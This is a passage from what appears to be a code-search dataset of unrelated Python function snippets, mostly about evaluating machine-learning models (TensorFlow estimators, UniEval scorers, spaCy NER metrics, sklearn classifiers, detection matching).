(frac,'pearson')] = \\\n stats.pearsonr(y_true, y_pred)[0]\n\n # Calculate spearman\n score.loc[idx, (frac,'spearman')] = \\\n stats.spearmanr(y_true, y_pred)[0]\n\n self.estimator = model\n self.last_scores = score\n self.last_hypes = hypes\n self.last_splits = last_splits\n\n return score", "def _make_train_input_fn(is_classification):\n\n def _input_fn():\n features = dict(FEATURES_DICT)\n if is_classification:\n labels = CLASSIFICATION_LABELS\n else:\n labels = REGRESSION_LABELS\n return features, labels\n\n return _input_fn", "def __init__(self, model_name_or_path, max_length=1024, device='cuda:0', cache_dir=None):\n self.scorer = UniEvaluator(\n model_name_or_path='MingZhong/unieval-fact' if model_name_or_path == \"\" else model_name_or_path,\n max_length=max_length,\n device=device,\n cache_dir=cache_dir)\n self.task = 'fact'\n self.dim = 'consistency'", "def __init__(self, model_name_or_path, max_length=1024, device='cuda:0', cache_dir=None):\n self.scorer = UniEvaluator(\n model_name_or_path='MingZhong/unieval-sum' if model_name_or_path == \"\" else model_name_or_path,\n max_length=max_length,\n device=device,\n cache_dir=cache_dir)\n self.task = 'summarization'\n self.dimensions = ['coherence', 'consistency', 'fluency', 'relevance']", "def as_estimator_spec(self):\n host_calls = {}\n if self.eval_metrics is not None:\n host_calls['eval_metrics'] = self.eval_metrics\n if self.host_call is not None:\n host_calls['host_call'] = self.host_call\n host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)\n eval_metric_ops = None\n if self.eval_metrics is not None:\n eval_metric_ops = host_call_ret['eval_metrics']\n hooks = None\n if self.host_call is not None:\n hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]\n scaffold = self.scaffold_fn() if self.scaffold_fn else None\n return model_fn_lib.EstimatorSpec(\n mode=self.mode,\n predictions=self.predictions,\n loss=self.loss,\n train_op=self.train_op,\n eval_metric_ops=eval_metric_ops,\n export_outputs=self.export_outputs,\n scaffold=scaffold,\n training_hooks=hooks,\n evaluation_hooks=hooks,\n prediction_hooks=hooks)", "def eval(self, *args, **kwargs):\n raise NotImplementedError", "def get_default_evaluator(self) -> EvaluatorConfig:\n raise NotImplementedError()", "def _set_eval(self):\n\n if self.model.__dict__['training']:\n self.model.eval()", "def evaluation(store, evaluation_obj):\n evaluation_obj['institute'] = store.institute(evaluation_obj['institute_id'])\n evaluation_obj['case'] = store.case(evaluation_obj['case_id'])\n evaluation_obj['variant'] = store.variant(evaluation_obj['variant_specific'])\n evaluation_obj['criteria'] = {criterion['term']: criterion for criterion in\n evaluation_obj['criteria']}\n evaluation_obj['classification'] = ACMG_COMPLETE_MAP[evaluation_obj['classification']]\n return evaluation_obj", "def eval(self):\n self.train(mode=False)", "def set_models_eval(self):\n raise NotImplementedError", "def evaluate(cfg: DictConfig):\n\n # suppress TensorFlow and DALI warnings\n suppress_warnings()\n\n if cfg.USE_MULTI_GPUS.VALUE:\n # change number of visible gpus for evaluation\n set_gpus(cfg.USE_MULTI_GPUS.GPU_IDS)\n # update batch size according to available gpus\n data_generator.update_batch_size(cfg)\n\n if cfg.OPTIMIZATION.AMP:\n print(\"Enabling Automatic Mixed Precision(AMP) training\")\n policy = mixed_precision.Policy('mixed_float16')\n mixed_precision.set_global_policy(policy)\n\n if cfg.OPTIMIZATION.XLA:\n print(\"Enabling Automatic Mixed Precision(XLA) training\")\n tf.config.optimizer.set_jit(True)\n\n # create model\n strategy = None\n if cfg.USE_MULTI_GPUS.VALUE:\n # multi gpu training using tensorflow mirrored strategy\n strategy = tf.distribute.MirroredStrategy(\n cross_device_ops=tf.distribute.HierarchicalCopyAllReduce()\n )\n print('Number of visible gpu devices: {}'.format(strategy.num_replicas_in_sync))\n with strategy.scope():\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=cfg.HYPER_PARAMETERS.LEARNING_RATE\n ) # optimizer\n if cfg.OPTIMIZATION.AMP:\n optimizer = mixed_precision.LossScaleOptimizer(\n optimizer,\n dynamic=True\n )\n dice_coef = DiceCoefficient(post_processed=True, classes=cfg.OUTPUT.CLASSES)\n dice_coef = tf.keras.metrics.MeanMetricWrapper(name=\"dice_coef\", fn=dice_coef)\n model = prepare_model(cfg, training=True)\n else:\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=cfg.HYPER_PARAMETERS.LEARNING_RATE\n ) # optimizer\n if cfg.OPTIMIZATION.AMP:\n optimizer = mixed_precision.LossScaleOptimizer(\n optimizer,\n dynamic=True\n )\n dice_coef = DiceCoefficient(post_processed=True, classes=cfg.OUTPUT.CLASSES)\n dice_coef = tf.keras.metrics.MeanMetricWrapper(name=\"dice_coef\", fn=dice_coef)\n model = prepare_model(cfg, training=True)\n\n model.compile(\n optimizer=optimizer,\n loss=unet3p_hybrid_loss,\n metrics=[dice_coef],\n )\n\n # weights model path\n checkpoint_path = join_paths(\n cfg.WORK_DIR,\n cfg.CALLBACKS.MODEL_CHECKPOINT.PATH,\n f\"{cfg.MODEL.WEIGHTS_FILE_NAME}.hdf5\"\n )\n\n assert os.path.exists(checkpoint_path), \\\n f\"Model weight's file does not exist at \\n{checkpoint_path}\"\n\n # TODO: verify without augment it produces same results\n # load model weights\n model.load_weights(checkpoint_path, by_name=True, skip_mismatch=True)\n model.summary()\n\n # data generators\n val_generator = data_generator.get_data_generator(cfg, \"VAL\", strategy)\n validation_steps = data_generator.get_iterations(cfg, mode=\"VAL\")\n\n # evaluation metric\n evaluation_metric = \"dice_coef\"\n if len(model.outputs) > 1:\n evaluation_metric = f\"{model.output_names[0]}_dice_coef\"\n\n result = model.evaluate(\n x=val_generator,\n steps=validation_steps,\n workers=cfg.DATALOADER_WORKERS,\n return_dict=True,\n )\n\n # return computed loss, validation accuracy, and it's metric name\n return result, evaluation_metric", "def model_build(self, estimators):\n return RandomForestClassifier(n_estimators=estimators, n_jobs=-1)", "def _evaluate_during_fit(self, test_loader, epoch):", "def evaluate(create_input_dict_fn, create_model_fn, eval_config, categories,\n checkpoint_dir, eval_dir):\n\n model = create_model_fn()\n\n if eval_config.ignore_groundtruth and not eval_config.export_path:\n logging.fatal('If ignore_groundtruth=True then an export_path is '\n 'required. Aborting!!!')\n\n tensor_dict = _extract_prediction_tensors(\n model=model,\n create_input_dict_fn=create_input_dict_fn,\n ignore_groundtruth=eval_config.ignore_groundtruth)\n \n \n def _process_batch(tensor_dict, sess, batch_index, counters):\n \"\"\"Evaluates tensors in tensor_dict, visualizing the first K examples.\n\n This function calls sess.run on tensor_dict, evaluating the original_image\n tensor only on the first K examples and visualizing detections overlaid\n on this original_image.\n\n Args:\n tensor_dict: a dictionary of tensors\n sess: tensorflow session\n batch_index: the index of the batch amongst all batches in the run.\n counters: a dictionary holding 'success' and 'skipped' fields which can\n be updated to keep track of number of successful and failed runs,\n respectively. If these fields are not updated, then the success/skipped\n counter values shown at the end of evaluation will be incorrect.\n\n Returns:\n result_dict: a dictionary of numpy arrays\n \"\"\"\n try:\n result_dict = sess.run(tensor_dict)\n counters['success'] += 1\n except tf.errors.InvalidArgumentError:\n logging.info('Skipping image')\n counters['skipped'] += 1\n return {}\n global_step = tf.train.global_step(sess, tf.train.get_global_step())\n eval_util.save_values_matrix(sess, result_dict)\n if batch_index < eval_config.num_visualizations:\n tag = 'image-{}'.format(batch_index)\n eval_util.visualize_detection_results(\n\t sess,\n result_dict,\n tag,\n global_step,\n categories=categories,\n summary_dir=eval_dir,\n export_dir=eval_config.visualization_export_dir,\n show_groundtruth=eval_config.visualization_export_dir)\n# print (result_dict)\n return result_dict\n\n variables_to_restore = tf.global_variables()\n global_step = tf.train.get_or_create_global_step()\n variables_to_restore.append(global_step)\n if eval_config.use_moving_averages:\n variable_averages = tf.train.ExponentialMovingAverage(0.0)\n variables_to_restore = variable_averages.variables_to_restore()\n saver = tf.train.Saver(variables_to_restore)\n\n def _restore_latest_checkpoint(sess):\n latest_checkpoint = tf.train.latest_checkpoint(checkpoint_dir)\n saver.restore(sess, latest_checkpoint)\n\n\n #############################################################\n def _save_values_matrix(sess, _process_batch, max_num_prediction):\n if not set([\n 'original_image', 'detection_boxes', 'detection_scores',\n 'detection_classes'\n ]).issubset(set(result_dict.keys())):\n raise ValueError('result_dict does not contain all expected keys.')\n if show_groundtruth and 'groundtruth_boxes' not in result_dict:\n raise ValueError('If show_groundtruth is enabled, result_dict must contain '\n 'groundtruth_boxes.')\n logging.info('Creating detection visualizations.')\n category_index = label_map_util.create_category_index(categories)\n\n image = np.squeeze(result_dict['original_image'], axis=0)\n detection_boxes = result_dict['detection_boxes']\n detection_scores = result_dict['detection_scores']\n detection_classes = np.int32((result_dict['detection_classes']))\n groundtruth_classes = np.int32((result_dict['groundtruth_classes']))\n detection_keypoints = result_dict.get('detection_keypoints', None)\n detection_masks = result_dict.get('detection_masks', None)\n groundtruth_boxes_b = result_dict['groundtruth_boxes']\n detection_boxes_2= box_list.BoxList(tf.convert_to_tensor(detection_boxes))\n groundtruth_boxes_2= box_list.BoxList(tf.convert_to_tensor(groundtruth_boxes_b))\n matchGT_matrix = list()\n FP_matrix= list()\n prueba=np.matrix([[0,1],[2,3]])\n if not isinstance(groundtruth_boxes_2, box_list.BoxList):\n raise ValueError('anchors must be an BoxList')\n t = region_similarity_calculator.IouSimilarity()\n compare_tensor = t.compare(detection_boxes_2,groundtruth_boxes_2)\n compare_array = sess.run(compare_tensor)\n len_compare = compare_array.shape\n for i in range(len_compare[1]):\n max_score= 0\n flag= 1\n for j in range(len_compare[0]):\n if len_compare[1]==1:\n IrU = compare_array[j]\n else:\n IrU = compare_array[j][i]\n if IrU>0.6 and detection_scores[j]>max_score:\n max_score= detection_scores[j]\n if flag==1:\n matchGT_matrix.append([detection_classes[j], groundtruth_classes[i], detection_scores[j]])\n flag= 0\n else:\n matchGT_matrix[i]=[detection_classes[j], groundtruth_classes[i], detection_scores[j]]\n if j==99 and max_score<0.6:\n matchGT_matrix[i]=[0, groundtruth_classes[i], max_score]\n if IrU<0.2 and i==1 and np.max(detection_scores[j])>0.5:\n FP_matrix.append([detection_classes[j], 0, detection_scores[j]])\n\n with open('/home/jesus.molina/matchGT_matrix.csv', 'r') as csv_file:\n newFileReader = csv.reader(csv_file)\n for row in newFileReader:\n matchGT_matrix.append(row)\n #print matchGT_matrix[1][0]\n\n with open('/home/jesus.molina/matchGT_matrix.csv', 'w') as csv_write:\n writer = csv.writer(csv_write, lineterminator='\\n')\n writer.writerows(matchGT_matrix)\n \n with open('/home/jesus.molina/FP_matrix.csv', 'r') as csv_file:\n newFileReader = csv.reader(csv_file)\n for row in newFileReader:\n FP_matrix.append(row)\n #print matchGT_matrix[1][0]\n\n with open('/home/jesus.molina/FP_matrix.csv', 'w') as csv_write:\n writer = csv.writer(csv_write, lineterminator='\\n')\n writer.writerows(FP_matrix) \n return 1\n #################################################################\n #################################################################\n #################################################################\n Pdd= _save_values_matrix\n \n metrics = eval_util.repeated_checkpoint_run(\n tensor_dict=tensor_dict,\n summary_dir=eval_dir,\n evaluators=get_evaluators(eval_config, categories),\n batch_processor=_process_batch,\n checkpoint_dirs=[checkpoint_dir],\n variables_to_restore=None,\n restore_fn=_restore_latest_checkpoint,\n num_batches=eval_config.num_examples,\n eval_interval_secs=eval_config.eval_interval_secs,\n max_number_of_evaluations=(1 if eval_config.ignore_groundtruth else\n eval_config.max_evals\n if eval_config.max_evals else None),\n master=eval_config.eval_master,\n save_graph=eval_config.save_graph,\n save_graph_dir=(eval_dir if eval_config.save_graph else ''))\n \n return metrics", "def build_evaluate_helper(cfg: CfgNode) -> EvaluateHelper:\n evaluator = build_evaluator(cfg.evaluator)\n helper = EvaluateHelper(evaluator)\n return helper", "def train(eps, total_num_eps, min_size, max_splits, nfeats_test):\n if len(eps) < min_size or max_splits == 0:\n return ExpressionDecisionLeaf.train(eps, total_num_eps, min_size, max_splits, nfeats_test)\n else:\n return ExpressionDecisionInner.train(eps, total_num_eps, min_size, max_splits, nfeats_test)", "def evaluate(self, epoch, data_source, arch_pool=None, fitnesses_dict=None, train_queue=None, criterion=None):\n\n fitnesses_dict = fitnesses_dict or {}\n total_avg_acc = 0\n total_avg_obj = 0\n\n # rank dict for the possible solutions\n model_specs_rank = {}\n model_specs_rank_before = {}\n queries = {}\n # as backup\n ind = 0\n eval_result = {}\n # let us sample 200 architecture to evaluate. # just keep the top K.\n\n # save the ranking, according to their GENOTYPE but not particle id\n rank_gens = sorted(model_specs_rank.items(), key=operator.itemgetter(1))\n\n self.ranking_per_epoch[epoch] = rank_gens\n self.eval_result[epoch] = eval_result\n # IPython.embed(header=\"Check evaluation result\")\n\n self.logger.info('VALIDATION RANKING OF PARTICLES')\n for pos, elem in enumerate(rank_gens):\n self.logger.info(f'particle gen id: {elem[1].geno_id}, acc: {elem[1].valid_acc}, obj {elem[1].valid_obj}, '\n f'hash: {elem[0]}, pos {pos}')\n\n return fitnesses_dict", "def evaluationset(self, batchsize=None, flatten=True):\n if batchsize is None:\n batchsize = self.batchsize\n\n return self.GENERATOR(self.x_eval, self.y_eval, batchsize, flatten=flatten, evaluate=True)", "def getFactoryEvaluateExpressionOnly(self):\n # factory function for evaluateExpressionOnly\n def evaluateExpressionOnly_factory(expression):\n return self.evaluateExpressionOnly(expression)\n\n return evaluateExpressionOnly_factory", "def evaluate(self, eval_data, eval_labels, eval_input_fn):\n raise NotImplementedError(\"Method must be implemented by subclass\")", "def evaluate_model():\n\n # Get the processed data (in proper format to evaluate the NER model)\n data = get_json_from_file_path(PROCESSED_DATA_PATH)\n # Split the dataset for training and test as we did for training\n train_data, test_data = train_test_split(data, train_size=0.7, \n random_state=4)\n\n # Load the model trained\n try:\n ner_model = spacy.load(OUTPUT_MODEL_PATH)\n except Exception as err:\n msg = f'Could not load the model. Error: {err}'\n raise Exception(msg)\n\n # Compute evaluation scores\n print('Computing metrics...')\n scores = evaluate(ner_model, test_data)\n # General metrics of the model\n f_score = scores.get('ents_f')\n precision = scores.get('ents_p')\n recall = scores.get('ents_r')\n print('\\nScoring:')\n print(f'F-score: {f_score}')\n print(f'Precision: {precision}')\n print(f'Recall: {recall}')\n\n # Get the specific scores for each entity \n scores_per_entity = scores.get('ents_per_type')\n # Get the F-score of the entities\n f_scores_of_entities = []\n for entity_scores in scores_per_entity.values():\n f_scores_of_entities.append(entity_scores['f'])\n # Compute the macro averaged F-score\n macro_avg_f_score = sum(f_scores_of_entities)/len(f_scores_of_entities)\n print(f'Macro averaged F-score: {macro_avg_f_score}')\n \n print('\\nScores per entity;')\n print('{:<15} {:<10} {:<10} {:<10}'.format('Entity','F-score','Precision','Recall'))\n for key, value in scores_per_entity.items():\n entity = key\n f, p, r = value['f'], value['p'], value['r']\n print('{:<15} {:<10.2f} {:<10.2f} {:<10.2f}'.format(entity, f, p, r))", "def __init__(self, model_name_or_path, max_length=1024, device='cuda:0', cache_dir=None):\n self.scorer = UniEvaluator(\n model_name_or_path='MingZhong/unieval-sum' if model_name_or_path == \"\" else model_name_or_path,\n max_length=max_length,\n device=device,\n cache_dir=cache_dir)\n self.task = 'data2text'\n self.dimensions = ['naturalness', 'informativeness']", "def __init__(\r\n self,\r\n generator,\r\n mode,\r\n tensorboard=None,\r\n verbose=1,\r\n **kwargs\r\n ):\r\n self.generator = generator\r\n\r\n if mode == 'recall':\r\n self.evaluate = eval_recall\r\n elif mode == 'accuracy':\r\n self.evaluate = eval_accuracy\r\n elif mode == 'mAP':\r\n self.evaluate = eval_mAP\r\n else:\r\n raise ValueError('unsupported evaluation callback mode')\r\n self.mode = mode\r\n\r\n self.tensorboard = tensorboard\r\n self.verbose = verbose\r\n self.kwargs = kwargs\r\n\r\n super(Evaluate, self).__init__()", "def create_eval_model(model_creator, hparams, scope=None, extra_args=None):\n vocab_file = hparams.vocab_file\n graph = tf.Graph()\n\n with graph.as_default(), tf.container(scope or \"eval\"):\n vocab_table = vocab_utils.create_vocab_tables(vocab_file)[0]\n data_file_placeholder = tf.placeholder(shape=(), dtype=tf.string)\n kb_file_placeholder = tf.placeholder(shape=(), dtype=tf.string)\n data_dataset = tf.data.TextLineDataset(data_file_placeholder)\n kb_dataset = tf.data.TextLineDataset(kb_file_placeholder)\n # this is the eval_actual iterator\n eval_iterator = iterator_utils.get_iterator(\n data_dataset,\n kb_dataset,\n vocab_table,\n batch_size=hparams.batch_size,\n t1=hparams.t1.encode(),\n t2=hparams.t2.encode(),\n eod=hparams.eod,\n len_action=hparams.len_action,\n random_seed=hparams.random_seed,\n num_buckets=hparams.num_buckets,\n max_dialogue_len=hparams.max_dialogue_len)\n # this is the placeholder iterator\n handle = tf.placeholder(tf.string, shape=[])\n iterator = tf.data.Iterator.from_string_handle(\n handle, eval_iterator.output_types, eval_iterator.output_shapes)\n batched_iterator = iterator_utils.get_batched_iterator(iterator)\n\n model = model_creator(\n hparams,\n iterator=batched_iterator,\n handle=handle,\n mode=tf.estimator.ModeKeys.EVAL,\n vocab_table=vocab_table,\n scope=scope,\n extra_args=extra_args)\n\n return EvalModel(\n graph=graph,\n model=model,\n placeholder_iterator=iterator,\n placeholder_handle=handle,\n eval_iterator=eval_iterator,\n data_file_placeholder=data_file_placeholder,\n kb_file_placeholder=kb_file_placeholder)", "def __init__(self, classifier, X, y, val_method, val_size, k, stratify):\n\t\tModel.counter += 1\n\n\t\tself.classifier = classifier\n\t\tself.X = X\n\t\tself.y = y\n\n\t\t# default name for the classifier\n\t\tself.name_ = 'classifier_' + str(Model.counter)\n\t\tself.type_ = ''\n\t\tself.comment_ = ''\n\t\tself.params_ = classifier.get_params()\t# hyperparameters of classifier\n\n\t\tif val_method == 'holdout':\n\t\t\tself.train_metrics, self.val_metrics = self.__hold_out_validation(\\\n\t\t\t\tclassifier, X, y, val_size, stratify)\n\t\telif val_method == 'cv':\n\t\t\tself.train_metrics, self.val_metrics = self.__cross_validation(\\\n\t\t\t\tclassifier, X, y, k, stratify)\n\t\telif val_method == 'loo':\n\t\t\tself.train_metrics, self.val_metrics = self.__cross_validation(\\\n\t\t\t\tclassifier, X, y, X.shape[0])\n\n\t\tself.test_metrics = None", "def evaluate_segmentations(\n samples,\n pred_field,\n gt_field=\"ground_truth\",\n eval_key=None,\n mask_targets=None,\n method=\"simple\",\n **kwargs,\n):\n fov.validate_collection_label_fields(\n samples, (pred_field, gt_field), fol.Segmentation, same_type=True\n )\n\n if mask_targets is None:\n if pred_field in samples.mask_targets:\n mask_targets = samples.mask_targets[pred_field]\n elif gt_field in samples.mask_targets:\n mask_targets = samples.mask_targets[gt_field]\n elif samples.default_mask_targets:\n mask_targets = samples.default_mask_targets\n\n config = _parse_config(pred_field, gt_field, method, **kwargs)\n eval_method = config.build()\n eval_method.register_run(samples, eval_key)\n\n results = eval_method.evaluate_samples(\n samples, eval_key=eval_key, mask_targets=mask_targets\n )\n eval_method.save_run_results(samples, eval_key, results)\n\n return results", "def fit(self, inputs: list) -> 'BasePreprocessor':", "def evaluate(self):\n raise NotImplementedError()", "def return_regressor_class(self):\n pass", "def eval_test(eval_fn, group1, group2, verbose = 0):\n # Only allow known-safe eval_fn's\n if eval_fn in [ 'my_classifier' ]:\n return evaluate(globals()[eval_fn], group1, group2, verbose)\n else:\n raise Exception(\"Error: Tester tried to use an invalid evaluation function: '%s'\" % eval_fn)", "def evaluate(self, features, labels):\n raise NotImplementedError('Not implemented')", "def getClassifier(self):\n return self.classify", "def evaluate(model, g, val_nid, device):\n model.eval()\n nfeat = g.ndata['features']\n labels = g.ndata['labels']\n with th.no_grad():\n pred = model.module.inference(g, nfeat, device, args.batch_size, args.num_workers)\n model.train()\n test_acc = Accuracy()\n return test_acc(th.softmax(pred[val_nid], -1), labels[val_nid].to(pred.device))", "def evaluate(self, batch_x, batch_y):\n raise NotImplementedError()", "def __init__(self):\n super().__init__()\n import sklearn\n import sklearn.multiclass\n self.model = sklearn.multiclass.OneVsRestClassifier", "def create_eval(self):\n self.ev_id = \"ev-\" + base64.b32encode(os.urandom(10)).decode(\"ascii\")\n self.ev_name = \"Evaluation: \" + self.ml_name\n self._ml.create_evaluation(\n EvaluationId=self.ev_id,\n EvaluationName=self.ev_name,\n MLModelId=self.ml_id,\n EvaluationDataSourceId=self.fold.eval_ds_id\n )\n logger.info(\"Created Evaluation \" + self.ev_id)", "def _get_expression_evaluator(pipeline_builder):\n expression_evaluator = pipeline_builder.add_stage('Expression Evaluator')\n expression_evaluator.header_attribute_expressions = [\n {'attributeToSet': 'title', 'headerAttributeExpression': '${pipeline:title()}'},\n {'attributeToSet': 'name', 'headerAttributeExpression': '${pipeline:name()}'},\n {'attributeToSet': 'version', 'headerAttributeExpression': '${pipeline:version()}'},\n {'attributeToSet': 'id', 'headerAttributeExpression': '${pipeline:id()}'},\n ]\n return expression_evaluator, pipeline_builder", "def usesEvaluationManager(self):\n \n pass", "def evaluate(self, eval_data, eval_labels, eval_input_fn=\"default\"):\n # Validations:\n # If it is of type str, make sure is a valid\n if isinstance(eval_input_fn, str):\n # We use a list in case we want to extend in the future.\n if eval_input_fn in [\"default\"]:\n if eval_input_fn == \"default\":\n # pylint: disable=no-member\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": eval_data},\n y=eval_labels,\n num_epochs=1,\n shuffle=False\n )\n\n eval_res = self.classifier.evaluate(input_fn=eval_input_fn)\n return eval_res", "def evaluate_design(self): # to update the pr object", "def evaluate(self, prediction_fn):\n pass", "def _eval_during_training(\r\n self, evaluator, output_path, save_best_model, epoch, steps):\r\n if evaluator is not None:\r\n score = evaluator(\r\n self, output_path=output_path, epoch=epoch, steps=steps)\r\n if score > self.best_score and save_best_model:\r\n self.save(output_path)\r\n self.best_score = score", "def eval_test(eval_fn, group1, group2, verbose = 0):\n # Only allow known-safe eval_fn's\n if eval_fn in [ 'my_classifier' ]:\n return evaluate(globals()[eval_fn], group1, group2, verbose)\n else:\n raise Exception, \"Error: Tester tried to use an invalid evaluation function: '%s'\" % eval_fn", "def eval_test(eval_fn, group1, group2, verbose = 0):\n # Only allow known-safe eval_fn's\n if eval_fn in [ 'my_classifier' ]:\n return evaluate(globals()[eval_fn], group1, group2, verbose)\n else:\n raise Exception, \"Error: Tester tried to use an invalid evaluation function: '%s'\" % eval_fn", "def setUp(self) -> None:\n fake_image = numpy.zeros(100)\n fake_pose = numpy.eye(4)\n fake_intrinsic = numpy.eye(3)\n self.evaluator = Evaluator(fake_image, fake_pose, fake_intrinsic, 1.0)\n self.evaluator.setComparisionImage(fake_image, fake_pose)\n return super().setUp()", "def evaluate(self, input_fn, eval_times, checkpoint_path=None):\n if not checkpoint_path:\n checkpoint_path = self._estimator.latest_checkpoint()\n\n if self._params.eval.type == 'customized':\n metrics = self._estimator.evaluate(\n input_fn, steps=eval_times, checkpoint_path=checkpoint_path)\n else:\n if not self._evaluator:\n self.prepare_evaluation()\n if checkpoint_path:\n current_step = int(os.path.basename(checkpoint_path).split('-')[1])\n else:\n current_step = 0\n predictor = self._estimator.predict(\n input_fn=input_fn,\n checkpoint_path=checkpoint_path,\n yield_single_examples=False)\n losses = collections.defaultdict(lambda: 0.0)\n\n counter = 0\n try:\n while eval_times is None or counter < eval_times:\n outputs = six.next(predictor)\n predictions = {}\n groundtruths = {}\n for key, val in outputs.items():\n if key[0:5] == 'pred_':\n predictions[key[5::]] = val\n if key[0:3] == 'gt_':\n groundtruths[key[3::]] = val\n if key[0:5] == 'loss_':\n losses[key[5::]] += np.mean(val)\n self._evaluator.update(\n predictions,\n groundtruths=(None if self._params.eval.use_json_file\n else groundtruths))\n counter = counter + 1\n tf.logging.info(\n f'Finish eval step {counter} out of total {eval_times} steps.')\n except (tf.errors.OutOfRangeError, StopIteration):\n logging.info(\n 'Evaluation reaches the end after running %d times.', counter)\n\n for key, val in outputs.items():\n if key[0:5] == 'loss_':\n losses[key[5::]] /= counter\n metrics = self._evaluator.evaluate()\n\n # Summary writer writes out eval metrics.\n output_dir = os.path.join(self._model_dir,\n 'eval' + self._params.eval.suffix)\n tf.gfile.MakeDirs(output_dir)\n summary_writer = tf.summary.FileWriter(output_dir)\n write_summary(metrics, summary_writer, current_step)\n write_summary(losses, summary_writer, current_step)\n summary_writer.close()\n\n logging.info('Eval result: %s', metrics)\n return metrics", "def __init__(self, method=\"RandomForest\", problem_type=\"infer\", rows_to_scan=\"all\"):\n self.feature_importances_ = None\n self.method = method\n self.problem_type = problem_type \n self.rows_to_scan = rows_to_scan", "def _eval_classifier(self):\n\n y_pred_baseline = self.df_baseline[self.score_column]\n y_pred_sample = self.df_sample[self.score_column]\n\n y_label_baseline = self.df_baseline[self.label_column]\n y_label_sample = self.df_sample[self.label_column]\n\n precision_baseline = precision_score(y_label_baseline, y_pred_baseline)\n recall_baseline = recall_score(y_label_baseline, y_pred_baseline)\n acc_baseline = accuracy_score(y_label_baseline, y_pred_baseline)\n f1_baseline = f1_score(y_label_baseline, y_pred_baseline)\n try:\n auc_baseline = roc_auc_score(y_label_baseline, y_pred_baseline)\n except ValueError:\n auc_baseline = \"NA\"\n\n precision_sample = precision_score(y_label_sample, y_pred_sample)\n recall_sample = recall_score(y_label_sample, y_pred_sample)\n acc_sample = accuracy_score(y_label_sample, y_pred_sample)\n f1_sample = f1_score(y_label_sample, y_pred_sample)\n try:\n auc_sample = roc_auc_score(y_label_sample, y_pred_sample)\n except ValueError:\n auc_sample = \"NA\"\n\n metrics_df = pd.DataFrame(\n {\n \"Accuracy\": [acc_baseline, acc_sample],\n \"Precision\": [precision_baseline, precision_sample],\n \"Recall\": [recall_baseline, recall_sample],\n \"F1\": [f1_baseline, f1_sample],\n \"AUC\": [auc_baseline, auc_sample],\n },\n index=[\"baseline\", \"sample\"],\n )\n\n self.performance_comparison = metrics_df", "def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)", "def evaluate(self):\n raise NotImplementedError(\"Abstract method\")", "def __init__(self, trainingInputs, trainingOutputs, iterations):\n logging.debug(\"evostumps.__init(%s, %s)\" %(str(trainingInputs), str(trainingOutputs)))\n self.inputs = trainingInputs\n self.targets = trainingOutputs\n initialClassifier = WrappedClassifier(StumpsClassifier(len(trainingInputs[0])),self.inputs,self.targets)\n self.optimiser = ClassifierOptimiser(initialClassifier, iterations)", "def eval(self):\n return self.with_transforms(\"eval\")", "def __init__(self, method=\"RandomForest\", n_random_feature_ratio=5, problem_type=\"infer\", rows_to_scan=\"all\"):\n self.feature_importances_ = None\n self.method = method\n self.problem_type = problem_type \n self.rows_to_scan = rows_to_scan \n self.n_random_feature_ratio = n_random_feature_ratio", "def eval(self):\n # self.recognizer.eval()\n self.detector.eval()\n self.shared_conv.eval()", "def evaluate(parser):\n required_args = (\n 'train_tfrecord',\n 'valid_tfrecord',\n 'predicted_data',\n 'actual_data',\n )\n cli_args = add_all_args(parser, EVALUATION, *required_args)\n evaluator = Evaluator(\n input_shape=cli_args.input_shape,\n model_configuration=cli_args.model_cfg,\n train_tf_record=cli_args.train_tfrecord,\n valid_tf_record=cli_args.valid_tfrecord,\n classes_file=cli_args.classes,\n max_boxes=cli_args.max_boxes,\n iou_threshold=cli_args.iou_threshold,\n score_threshold=cli_args.score_threshold,\n )\n predicted = pd.read_csv(cli_args.predicted_data)\n actual = pd.read_csv(cli_args.actual_data)\n evaluator.calculate_map(\n prediction_data=predicted,\n actual_data=actual,\n min_overlaps=cli_args.min_overlaps,\n display_stats=cli_args.display_stats,\n save_figs=cli_args.save_figs,\n plot_results=cli_args.plot_stats,\n )" ]
